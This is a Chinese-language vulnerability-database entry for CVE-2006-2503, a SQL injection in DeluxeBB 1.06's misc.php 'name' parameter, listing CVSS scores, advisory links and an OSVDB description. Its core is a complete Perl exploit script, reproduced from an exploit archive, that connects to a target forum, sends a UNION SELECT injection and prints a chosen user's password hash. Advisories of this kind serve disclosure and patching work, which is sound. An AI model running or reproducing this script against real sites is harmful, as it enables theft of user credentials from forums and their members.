CVE-2006-2503
CVSS7.5
发布时间 :2006-05-22 15:02:00
修订时间 :2011-03-07 21:36:19
NMCOE    

[原文]SQL injection vulnerability in misc.php in DeluxeBB 1.06 allows remote attackers to execute arbitrary SQL commands via the name parameter.


[CNNVD]DeluxeBB misc.php SQL注入漏洞(CNNVD-200605-403)

        DeluxeBB 1.06的misc.php中存在SQL注入漏洞,远程攻击者可以通过name参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2503
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2503
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-403
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/26469
(UNKNOWN)  XF  deluxebb-misc-sql-injection(26469)
http://www.vupen.com/english/advisories/2006/1823
(UNKNOWN)  VUPEN  ADV-2006-1823
http://www.securityfocus.com/bid/17989
(UNKNOWN)  BID  17989
http://www.securityfocus.com/archive/1/archive/1/434040/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060515 DeluxeBB 1.06 Remote SQL Injection Exploit
http://www.osvdb.org/25529
(UNKNOWN)  OSVDB  25529
http://secunia.com/advisories/20104
(VENDOR_ADVISORY)  SECUNIA  20104
http://securityreason.com/securityalert/935
(UNKNOWN)  SREASON  935

- 漏洞信息

DeluxeBB misc.php SQL注入漏洞
高危 SQL注入
2006-05-22 00:00:00 2006-05-22 00:00:00
远程  
        DeluxeBB 1.06的misc.php中存在SQL注入漏洞,远程攻击者可以通过name参数执行任意SQL命令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1793)

DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off) (EDBID:1793)
php webapps
2006-05-15 Verified
0 KingOfSka
N/A [点击下载]
#!/usr/bin/perl

use IO::Socket;


print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# 	exploit discovered and coded        #
#	   by KingOfSka                     #
#	http://contropotere.netsons.org	    #
#############################################
};

if (!$ARGV[2]) {

print q{ 
	Usage: perl dbbxpl.pl host /directory/ victim_userid 
  
       perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

# milw0rm.com [2006-05-15]
		

- 漏洞信息

25529
DeluxeBB misc.php name Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

DeluxeBB contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the misc.php script not properly sanitizing user-supplied input to the "name" variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2006-05-15 Unknow
2006-05-15 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站